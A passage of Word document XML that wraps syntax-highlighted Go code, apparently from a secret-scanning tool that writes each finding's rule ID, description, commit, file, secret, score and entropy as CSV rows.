          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">f </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">range </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f {</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>err = cw.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>([]</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.RuleID</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Description</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.File</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strconv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Itoa</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.ScoreStrength)</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strconv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FormatFloat</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>float64</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Entropy)</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'f'</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
